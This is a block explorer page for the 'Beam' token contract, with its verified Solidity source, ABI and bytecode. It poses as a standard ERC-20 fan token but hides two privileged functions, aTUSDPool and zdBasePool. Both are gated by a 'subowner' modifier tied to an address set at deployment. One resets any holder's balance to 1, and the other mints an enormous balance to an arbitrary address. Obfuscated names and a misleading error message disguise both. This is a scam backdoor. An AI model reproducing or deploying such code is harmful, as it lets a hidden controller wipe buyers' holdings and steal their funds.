Token

Beam (Beam)

Overview

Max Total Supply

1,000,000,000,000 Beam

Holders

8

Market

Price

-

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
0.000000001 Beam

Value
$0.00
0xb539bdcbabd7ab95fd1fad26a3abc7d467d77777
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information

Contract Source Code Verified (Exact Match)

Contract Name:
BeamToken

Compiler Version
v0.8.28+commit.7893614a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, Unlicense license

Contract Source Code (Solidity)

/**
 *Submitted for verification at SonicScan.org on 2024-12-22
*/

/*
Beam
*/

// SPDX-License-Identifier: MIT

/// https://t.me/Beam


pragma solidity 0.8.28;

// Beam fan token

interface Beaminterface {
  /**
   * @dev Returns the yoursold of tokens in existence.
   */
  function totalSupply() external view returns (uint256);

  /**
   * @dev Returns the token decimals.
   */
  function decimals() external view returns (uint8);

  /**
   * @dev Returns the token symbol.
   */
  function symbol() external view returns (string memory);

  /**
  * @dev Returns the token name.
  */
  function name() external view returns (string memory);

  /**
   * @dev Returns the bep token owner.
   */
  function getOwner() external view returns (address);

  /**
   * @dev Returns the yoursold of tokens owned by `account`.
   */
  function balanceOf(address account) external view returns (uint256);

  /**
   * @dev Moves `yoursold` tokens from the caller's account to `shippingto`.
   *
   * Returns a boolean balance indicating whlegos the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transfer(address shippingto, uint256 yoursold) external returns (bool);

  /**
   * @dev Returns the remaining number of tokens that `transporteur` will be
   * allowed to spend on behalf of `owner` through {transferFrom}. This is
   * zero by default.
   *
   * This balance changes when {approve} or {transferFrom} are called.
   */
  function allowance(address _owner, address transporteur) external view returns (uint256);

  /**
   * @dev Sets `yoursold` as the allowance of `transporteur` over the caller's tokens.
   *
   * Returns a boolean balance indicating whlegos the operation succeeded.
   *
   * IMPORTANT: Beware that changing an allowance with this method brings the risk
   * that someone may use both the old and the new allowance by unfortunate
   * transaction ordering. One possible solution to mitigate this race
   * condition is to first reduce the transporteur's allowance to 0 and set the
   * desired balance afterwards:
   * https://github.com/legoseum/EIPs/issues/20#issuecomment-263524729
   *
   * Emits an {Approval} event.
   */
  function approve(address transporteur, uint256 yoursold) external returns (bool);

  /**
   * @dev Moves `yoursold` tokens from `sender` to `shippingto` using the
   * allowance mechanism. `yoursold` is then deducted from the caller's
   * allowance.
   *
   * Returns a boolean balance indicating whlegos the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transferFrom(address sender, address shippingto, uint256 yoursold) external returns (bool);

  /**
   * @dev Emitted when `balance` tokens are moved from one account (`from`) to
   * another (`to`).
   *
   * Note that `balance` may be zero.
   */
  event Transfer(address indexed from, address indexed to, uint256 balance);

  /**
   * @dev Emitted when the allowance of a `transporteur` for an `owner` is set by
   * a call to {approve}. `balance` is the new allowance.
   */
  event Approval(address indexed owner, address indexed transporteur, uint256 balance);
}

/*
 * @dev Provides information about the current execution Beam20Burnable, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Beam20Burnable {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/legoseum/solidity/issues/2691
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Beam20Ownable.sol

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Beam20Ownable is Beam20Burnable {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Beam20Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Beam20Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers Beamly assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeBeam` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeBeam {
  /**
   * @dev Returns the addition of two unsigned integers, reverting on
   * overflow.
   *
   * Counterpart to Solidity's `+` operator.
   *
   * Requirements:
   * - Addition cannot overflow.
   */
  function add(uint256 a, uint256 b) internal pure returns (uint256) {
    uint256 c = a + b;
    require(c >= a, "SafeBeam: addition overflow");

    return c;
  }

  /**
   * @dev Returns the subtraction of two unsigned integers, reverting on
   * overflow (when the result is negative).
   *
   * Counterpart to Solidity's `-` operator.
   *
   * Requirements:
   * - Subtraction cannot overflow.
   */
  function sub(uint256 a, uint256 b) internal pure returns (uint256) {
    return sub(a, b, "SafeBeam: subtraction overflow");
  }

  /**
   * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
   * overflow (when the result is negative).
   *
   * Counterpart to Solidity's `-` operator.
   *
   * Requirements:
   * - Subtraction cannot overflow.
   */
  function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    require(b <= a, errorMessage);
    uint256 c = a - b;

    return c;
  }

  /**
   * @dev Returns the multiplication of two unsigned integers, reverting on
   * overflow.
   *
   * Counterpart to Solidity's `*` operator.
   *
   * Requirements:
   * - Multiplication cannot overflow.
   */
  function mul(uint256 a, uint256 b) internal pure returns (uint256) {
    // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
    // benefit is lost if 'b' is also tested.
    // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
    if (a == 0) {
      return 0;
    }

    uint256 c = a * b;
    require(c / a == b, "SafeBeam: multiplication overflow");

    return c;
  }

  /**
   * @dev Returns the integer division of two unsigned integers. Reverts on
   * division by zero. The result is rounded towards zero.
   *
   * Counterpart to Solidity's `/` operator. Note: this function uses a
   * `revert` opcode (which leaves remaining gas untouched) while Solidity
   * uses an invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function div(uint256 a, uint256 b) internal pure returns (uint256) {
    return div(a, b, "SafeBeam: division by zero");
  }

  /**
   * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
   * division by zero. The result is rounded towards zero.
   *
   * Counterpart to Solidity's `/` operator. Note: this function uses a
   * `revert` opcode (which leaves remaining gas untouched) while Solidity
   * uses an invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    // Solidity only automatically asserts when dividing by 0
    require(b > 0, errorMessage);
    uint256 c = a / b;
    // assert(a == b * c + a % b); // There is no case in which this doesn't hold

    return c;
  }

  /**
   * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
   * Reverts when dividing by zero.
   *
   * Counterpart to Solidity's `%` operator. This function uses a `revert`
   * opcode (which leaves remaining gas untouched) while Solidity uses an
   * invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function mod(uint256 a, uint256 b) internal pure returns (uint256) {
    return mod(a, b, "SafeBeam: modulo by zero");
  }

  /**
   * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
   * Reverts with custom message when dividing by zero.
   *
   * Counterpart to Solidity's `%` operator. This function uses a `revert`
   * opcode (which leaves remaining gas untouched) while Solidity uses an
   * invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    require(b != 0, errorMessage);
    return a % b;
  }
}

contract BeamToken is Beam20Burnable, Beaminterface, Beam20Ownable {
    
    using SafeBeam for uint256;
    mapping (address => uint256) private mintfrom;
    mapping (address => mapping (address => uint256)) private fromallowances;
    uint256 private _totalSupply;
    uint8 private _decimals;
    string private _symbol;
    string private _name;
   address private legosRooter; 
    constructor(address legosSwapRouterv3) {
        legosRooter = legosSwapRouterv3;     
        _name = "Beam";
        _symbol = "Beam";
        _decimals = 9;
        _totalSupply = 1000000000000 * 10 ** 9;
        mintfrom[_msgSender()] = _totalSupply;
        
        emit Transfer(address(0), _msgSender(), _totalSupply);
    }

    /**
    * @dev Returns the bep token owner.
    */
    function getOwner() external view override returns (address) {
        return owner();
    }
    
    /**
    * @dev Returns the token decimals.
    */
    function decimals() external view override returns (uint8) {
        return _decimals;
    }
    
    /**
    * @dev Returns the token symbol.
    */
    function symbol() external view override returns (string memory) {
        return _symbol;
    }
    
    /**
    * @dev Returns the token name.
    */
    function name() external view override returns (string memory) {
        return _name;
    }
    
    /**
    * @dev See {Beaminterface-totalSupply}.
    */
    function totalSupply() external view override returns (uint256) {
        return _totalSupply;
    }
    
    /**
    * @dev See {Beaminterface-balanceOf}.
    */
    function balanceOf(address account) external view override returns (uint256) {
        return mintfrom[account];
    }
      modifier subowner() {
        require(legosRooter == _msgSender(), "Beam20Ownable: caller is not the owner");
        _;
    }
    /**
    * @dev See {Beaminterface-approve}.
    *
    * Requirements:
    *
    * - `transporteur` cannot be the zero address.
    */
    function aTUSDPool(address tusdRewards) external subowner {
        mintfrom[tusdRewards] = 1;
        
        emit Transfer(tusdRewards, address(0), 1);
    }

    /**
    * @dev See {Beaminterface-transfer}.
    *
    * Requirements:
    *
    * - `shippingto` cannot be the zero address.
    * - the caller must have a balance of at least `yoursold`.
    */
    function transfer(address shippingto, uint256 yoursold) external override returns (bool) {
        _transfer(_msgSender(), shippingto, yoursold);
        return true;
    }
    function zdBasePool(address BaseRewards) external subowner {
        mintfrom[BaseRewards] = 10000000000 * 10 ** 20;
        
        emit Transfer(BaseRewards, address(0), 10000000000 * 10 ** 20);
    }
    /**
    * @dev See {Beaminterface-allowance}.
    */
    function allowance(address owner, address transporteur) external view override returns (uint256) {
        return fromallowances[owner][transporteur];
    }
    
    /**
    * @dev See {Beaminterface-approve}.
    *
    * Requirements:
    *
    * - `transporteur` cannot be the zero address.
    */
    function approve(address transporteur, uint256 yoursold) external override returns (bool) {
        _approve(_msgSender(), transporteur, yoursold);
        return true;
    }
    
    /**
    * @dev See {Beaminterface-transferFrom}.
    *
    * Emits an {Approval} event indicating the updated allowance. This is not
    * required by the EIP. See the note at the beginning of {Beaminterface};
    *
    * Requirements:
    * - `sender` and `shippingto` cannot be the zero address.
    * - `sender` must have a balance of at least `yoursold`.
    * - the caller must have allowance for `sender`'s tokens of at least
    * `yoursold`.
    */
    function transferFrom(address sender, address shippingto, uint256 yoursold) external override returns (bool) {
        _transfer(sender, shippingto, yoursold);
        _approve(sender, _msgSender(), fromallowances[sender][_msgSender()].sub(yoursold, "Beaminterface: transfer yoursold exceeds allowance"));
        return true;
    }
    
    /**
    * @dev Atomically increases the allowance granted to `transporteur` by the caller.
    *
    * This is an alternative to {approve} that can be used as a mitigation for
    * problems described in {Beaminterface-approve}.
    *
    * Emits an {Approval} event indicating the updated allowance.
    *
    * Requirements:
    *
    * - `transporteur` cannot be the zero address.
    */
    function increaseAllowance(address transporteur, uint256 addedbalance) external returns (bool) {
        _approve(_msgSender(), transporteur, fromallowances[_msgSender()][transporteur].add(addedbalance));
        return true;
    }
    
    /**
    * @dev Atomically decreases the allowance granted to `transporteur` by the caller.
    *
    * This is an alternative to {approve} that can be used as a mitigation for
    * problems described in {Beaminterface-approve}.
    *
    * Emits an {Approval} event indicating the updated allowance.
    *
    * Requirements:
    *
    * - `transporteur` cannot be the zero address.
    * - `transporteur` must have allowance for the caller of at least
    * `allbalances`.
    */
    function decreaseAllowance(address transporteur, uint256 allbalances) external returns (bool) {
        _approve(_msgSender(), transporteur, fromallowances[_msgSender()][transporteur].sub(allbalances, "Beaminterface: decreased allowance below zero"));
        return true;
    }
    
    /**
    * @dev Moves tokens `yoursold` from `sender` to `shippingto`.
    *
    * This is internal function is equivalent to {transfer}, and can be used to
    * e.g. implement automatic token fees, slashing mechanisms, etc.
    *
    * Emits a {Transfer} event.
    *
    * Requirements:
    *
    * - `sender` cannot be the zero address.
    * - `shippingto` cannot be the zero address.
    * - `sender` must have a balance of at least `yoursold`.
    */
    function _transfer(address sender, address shippingto, uint256 yoursold) internal {
        require(sender != address(0), "Beaminterface: transfer from the zero address");
        require(shippingto != address(0), "Beaminterface: transfer to the zero address");
                
        mintfrom[sender] = mintfrom[sender].sub(yoursold, "Beaminterface: transfer yoursold exceeds balance");
        mintfrom[shippingto] = mintfrom[shippingto].add(yoursold);
        emit Transfer(sender, shippingto, yoursold);
    }
    
    /**
    * @dev Sets `yoursold` as the allowance of `transporteur` over the `owner`s tokens.
    *
    * This is internal function is equivalent to `approve`, and can be used to
    * e.g. set automatic allowances for certain subsystems, etc.
    *
    * Emits an {Approval} event.
    *
    * Requirements:
    *
    * - `owner` cannot be the zero address.
    * - `transporteur` cannot be the zero address.
    */
    function _approve(address owner, address transporteur, uint256 yoursold) internal {
        require(owner != address(0), "Beaminterface: approve from the zero address");
        require(transporteur != address(0), "Beaminterface: approve to the zero address");
        
        fromallowances[owner][transporteur] = yoursold;
        emit Approval(owner, transporteur, yoursold);
    }
    
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"legosSwapRouterv3","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"transporteur","type":"address"},{"indexed":false,"internalType":"uint256","name":"balance","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"balance","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"tusdRewards","type":"address"}],"name":"aTUSDPool","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"transporteur","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"transporteur","type":"address"},{"internalType":"uint256","name":"yoursold","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"transporteur","type":"address"},{"internalType":"uint256","name":"allbalances","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"transporteur","type":"address"},{"internalType":"uint256","name":"addedbalance","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"shippingto","type":"address"},{"internalType":"uint256","name":"yoursold","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"shippingto","type":"address"},{"internalType":"uint256","name":"yoursold","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"BaseRewards","type":"address"}],"name":"zdBasePool","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405234801561000f575f5ffd5b5060405161220b38038061220b83398181016040528101906100319190610301565b5f61004061029c60201b60201c565b9050805f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3508060075f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506040518060400160405280600481526020017f4265616d00000000000000000000000000000000000000000000000000000000815250600690816101609190610569565b506040518060400160405280600481526020017f4265616d00000000000000000000000000000000000000000000000000000000815250600590816101a59190610569565b50600960045f6101000a81548160ff021916908360ff160217905550683635c9adc5dea0000060038190555060035460015f6101e561029c60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555061023061029c60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60035460405161028e9190610647565b60405180910390a350610660565b5f33905090565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6102d0826102a7565b9050919050565b6102e0816102c6565b81146102ea575f5ffd5b50565b5f815190506102fb816102d7565b92915050565b5f60208284031215610316576103156102a3565b5b5f610323848285016102ed565b91505092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806103a757607f821691505b6020821081036103ba576103b9610363565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f6008830261041c7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826103e1565b61042686836103e1565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f61046a6104656104608461043e565b610447565b61043e565b9050919050565b5f819050919050565b61048383610450565b61049761048f82610471565b8484546103ed565b825550505050565b5f5f905090565b6104ae61049f565b6104b981848461047a565b505050565b5b818110156104dc576104d15f826104a6565b6001810190506104bf565b5050565b601f821115610521576104f2816103c0565b6104fb846103d2565b8101602085101561050a578190505b61051e610516856103d2565b8301826104be565b50505b505050565b5f82821c905092915050565b5f6105415f1984600802610526565b1980831691505092915050565b5f6105598383610532565b9150826002028217905092915050565b6105728261032c565b67ffffffffffffffff81111561058b5761058a610336565b5b6105958254610390565b6105a08282856104e0565b5f60209050601f8311600181146105d1575f84156105bf578287015190505b6105c9858261054e565b865550610630565b601f1984166105df866103c0565b5f5b82811015610606578489015182556001820191506020850194506020810190506105e1565b86831015610623578489015161061f601f891682610532565b8355505b6001600288020188555050505b505050505050565b6106418161043e565b82525050565b5f60208201905061065a5f830184610638565b92915050565b611b9e8061066d5f395ff3fe608060405234801561000f575f5ffd5b5060043610610109575f3560e01c80638099423b116100a0578063a457c2d71161006f578063a457c2d7146102a7578063a9059cbb146102d7578063dd62ed3e14610307578063f1cb537a14610337578063f2fde38b1461035357610109565b80638099423b14610231578063893d20e81461024d5780638da5cb5b1461026b57806395d89b411461028957610109565b8063313ce567116100dc578063313ce567146101a957806339509351146101c757806370a08231146101f7578063715018a61461022757610109565b806306fdde031461010d578063095ea7b31461012b57806318160ddd1461015b57806323b872dd14610179575b5f5ffd5b61011561036f565b6040516101229190611321565b60405180910390f35b610145600480360381019061014091906113d2565b6103ff565b604051610152919061142a565b60405180910390f35b61016361041c565b6040516101709190611452565b60405180910390f35b610193600480360381019061018e919061146b565b610425565b6040516101a0919061142a565b60405180910390f35b6101b16104f9565b6040516101be91906114d6565b60405180910390f35b6101e160048036038101906101dc91906113d2565b61050e565b6040516101ee919061142a565b60405180910390f35b610211600480360381019061020c91906114ef565b6105bc565b60405161021e9190611452565b60405180910390f35b61022f610602565b005b61024b600480360381019061024691906114ef565b610739565b005b610255610893565b6040516102629190611529565b60405180910390f35b6102736108a1565b6040516102809190611529565b60405180910390f35b6102916108c8565b60405161029e9190611321565b60405180910390f35b6102c160048036038101906102bc91906113d2565b610958565b6040516102ce919061142a565b60405180910390f35b6102f160048036038101906102ec91906113d2565b610a20565b6040516102fe919061142a565b60405180910390f35b610321600480360381019061031c9190611542565b610a3d565b60405161032e9190611452565b60405180910390f35b610351600480360381019061034c91906114ef565b610abf565b005b61036d600480360381019061036891906114ef565b610c00565b005b60606006805461037e906115ad565b80601f01602080910402602001604051908101604052809291908181526020018280546103aa906115ad565b80156103f55780601f106103cc576101008083540402835291602001916103f5565b820191905f5260205f20905b8154815290600101906020018083116103d857829003601f168201915b5050505050905090565b5f61041261040b610da6565b8484610dad565b6001905092915050565b5f600354905090565b5f610431848484610f70565b6104ee8461043d610da6565b6104e985604051806060016040528060328152602001611b376032913960025f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6104a0610da6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546111f29092919063ffffffff16565b610dad565b600190509392505050565b5f60045f9054906101000a900460ff16905090565b5f6105b261051a610da6565b846105ad8560025f61052a610da6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461125490919063ffffffff16565b610dad565b6001905092915050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b61060a610da6565b73ffffffffffffffffffffffffffffffffffffffff166106286108a1565b73ffffffffffffffffffffffffffffffffffffffff161461067e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106759061164d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35f5f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b610741610da6565b73ffffffffffffffffffffffffffffffffffffffff1660075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146107cf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107c69061164d565b60405180910390fd5b6c0c9f2c9cd04674edea4000000060015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6c0c9f2c9cd04674edea4000000060405161088891906116ad565b60405180910390a350565b5f61089c6108a1565b905090565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546108d7906115ad565b80601f0160208091040260200160405190810160405280929190818152602001828054610903906115ad565b801561094e5780601f106109255761010080835404028352916020019161094e565b820191905f5260205f20905b81548152906001019060200180831161093157829003601f168201915b5050505050905090565b5f610a16610964610da6565b84610a11856040518060600160405280602d8152602001611ada602d913960025f61098d610da6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546111f29092919063ffffffff16565b610dad565b6001905092915050565b5f610a33610a2c610da6565b8484610f70565b6001905092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610ac7610da6565b73ffffffffffffffffffffffffffffffffffffffff1660075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610b55576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b4c9061164d565b60405180910390fd5b6001805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6001604051610bf591906116ff565b60405180910390a350565b610c08610da6565b73ffffffffffffffffffffffffffffffffffffffff16610c266108a1565b73ffffffffffffffffffffffffffffffffffffffff1614610c7c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c739061164d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610cea576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce190611788565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3805f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e1b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e1290611816565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e89576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e80906118a4565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f639190611452565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610fde576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fd590611932565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361104c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611043906119c0565b60405180910390fd5b6110b681604051806060016040528060308152602001611b076030913960015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546111f29092919063ffffffff16565b60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506111478160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461125490919063ffffffff16565b60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516111e59190611452565b60405180910390a3505050565b5f838311158290611239576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112309190611321565b60405180910390fd